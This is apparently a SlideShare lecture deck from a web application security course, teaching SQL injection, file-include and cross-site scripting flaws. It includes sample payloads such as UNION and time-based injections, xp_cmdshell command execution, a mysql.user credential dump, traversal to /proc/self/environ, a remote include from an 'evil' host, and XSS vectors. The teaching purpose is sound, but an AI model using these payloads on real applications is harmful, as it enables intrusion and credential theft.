Web Application Security 101 - 14 Data Validation


Published on

In part 14 of Web Application Security 101 you will learn about SQL Injection, Cross-site Scripting, Local File Includes and other common types of data validation problems.

Published in: Software
1 Like
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Web Application Security 101 - 14 Data Validation

  1. 1. Data Validation Common input validation problems.
  2. 2. Types Of Problems SQL Injection Local File Includes Cross-site Scripting
  3. 3. SQL Injection SQL Injection is an attack where a partial or a complete SQL query is inserted/injected into another query run by the targeted application.
  4. 4. Types Of SQL Injection Vanilla - when errors are displayed. Blind - when no errors are displayed.
  5. 5. SQL Backends There are multiple SQL backends that have various features. Common Backends MsSQL (Transact-SQL) MySQL PostgreSQL Oracle (PL/SQL) Many More
  6. 6. SQL Injection In Principle Works by injecting SQL parts in already existing queries. SELECT * FROM table WHERE column = 'injected by the user'
  7. 7. In Detail Assuming that $valueis a variable controlled by the user: $query = "SELECT * FROM table WHERE column = '" + $value + "'"; When $valueequals to ' OR '1'='1then: SELECT * FROM table WHERE column = '' OR '1'='1'
  8. 8. SQL Injection Techniques Union Selection - to obtain values from other tables. SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e' Boolean Selection - to create universally true or false statements. SELECT * FROM table WHERE column = '' OR '1'='1' Time Selection - to measure injection by timing the execution. SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false'))--'
  9. 9. MsSQL Injection Techniques Table enumeration - find the table structure. SELECT * FROM table WHERE column = '' HAVING 1=1--' SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1-- Code execution - running arbitrary commands. SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'comman Query delay - timing delay after query. SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'
  10. 10. MySQL Injection Techniques Pt. 1 Finding information - retrieving various server variables and functions. SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b', User enumeration - retrieving MySQL server users and passwords. SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'
  11. 11. MySQL Injection Techniques Pt. 2 Table enumeration - retrieving MySQL server tables. SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables# Column enumeration - retrieving MySQL server columns. SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns
  12. 12. SQL Injection Tools Sqlninja Sqlmap
  13. 13. SQL Injection Is Art There are many different types of tools and techniques with various level of complexity used to exploit SQL Injection vulnerabilities.
  14. 14. File Includes This attack vector is used to perform arbitrary file/url read or execution using low-level functions and application-specific features.
  15. 15. Types Of File Includes Local File Include - when the included file is local. Remote File Include - when the included file is fetched remotely.
  16. 16. File Include In Principle Works when user data reaches a function used to fetch a file. <?php fetchfile("./path/to/file/injected by the user") ?>
  17. 17. In Detail Assuming that $valueis a variable controlled by the user: <?php fetchfile("./path/to/file/" . $value) ?> When $valueequals to ../../../index.phpthen: <?php fetchfile("./path/to/file/../../../index.php") ?>
  18. 18. File Include Techniques Pt. 1 Usage of ../to traverse directory structure. <?php fetchfile("./path/to/file/../../../index.php") ?> Usage of null (0x00) to terminate strings for low level C functions. <?php fetchfile("./path/to/file/../../../index.php0.txt") ?>
  19. 19. File Include Techniques Pt. 2 Usage of overlong dot (0xc0, 0xae) to by pass escape functions. <?php fetchfile("./path/to/file/xc0xae./../../index.php0.txt") ?> Usage of system resources to cause other behaviour. <?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
  20. 20. Remote File Includes This type of problem occurs when injecting a remote file controlled by the attacker. In this case, the attacker has a greater control over the exploitation process if something special is done to the file. <?php fetchfile("http://evil/path/to/file") ?>
  21. 21. FI Is Art File Include attacks are a popular mechanism for compromising web applications.
  22. 22. Cross-site Scripting Is a type of vulnerability where an attacker can bypass SOP (Same Origin Policy) through client-side injection or by abusing forms of configuration.
  23. 23. Types Of XSS Reflected - when the injection is immediately returned. Stored - when the injection is stored. DOM-based - when the injection occurs due to JS. Others - the are many other uncategorized varients.
  24. 24. XSS In Principle Works by injecting fragments of HTML/JS inside the web page. <span>injected by the user</span>
  25. 25. In Detail Assuming that $valueis a variable controlled by the user: <?php ?><span><?php echo $value ?></span> When $valueequals to <script>alert(1)</script>then: <span><script>alert(1)</script></span>
  26. 26. XSS Techniques Pt. 1 When script tags are sanitized or escaped. <span><img src=a onerror=alert(1)></span> When the injection occurs inside an event attribute. <button onclick="alert(1)"></button>
  27. 27. XSS Techniques Pt. 2 When the injection occurs inside JavaScript a tag. <script>var a = ""; alert(1); "";</script> When the injection occurs in multiple small places. <span><script>alert(1)/* is something like */</script></span>
  28. 28. Stored XSS The injection is temporarily or permanently stored. <?php $_SESSION['name'] = $_GET['name'] ?> Later on there is this code that causes for the XSS to occur: <?php ?><span><?php echo $_SESSION['name'] ?></span>
  29. 29. DOM-based XSS The injection may occur at any point but triggered via JavaScript. <script> var match = document.location.search.match(/[?&]name=(w+)/); if (match) { document.write("Hello " + match[1]); } </script> There are many different ways an injection can occur.
  30. 30. Other Forms Of XSS The presence of crossdomain.xmlmay open the app to XSS. <?xml version="1.0" encoding="UTF-8" ?> <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>
  31. 31. XSS Is Art Cross-site scripting is very popular and widely spread vulnerability.
  32. 32. Other Input Validations Flaws Memory Corruption Command Injection LDAP Injection XML Injection XPATH Injection SSI Injection Remote File Inclusion Many, Many More
  33. 33. Lab We will be finding data validation problems.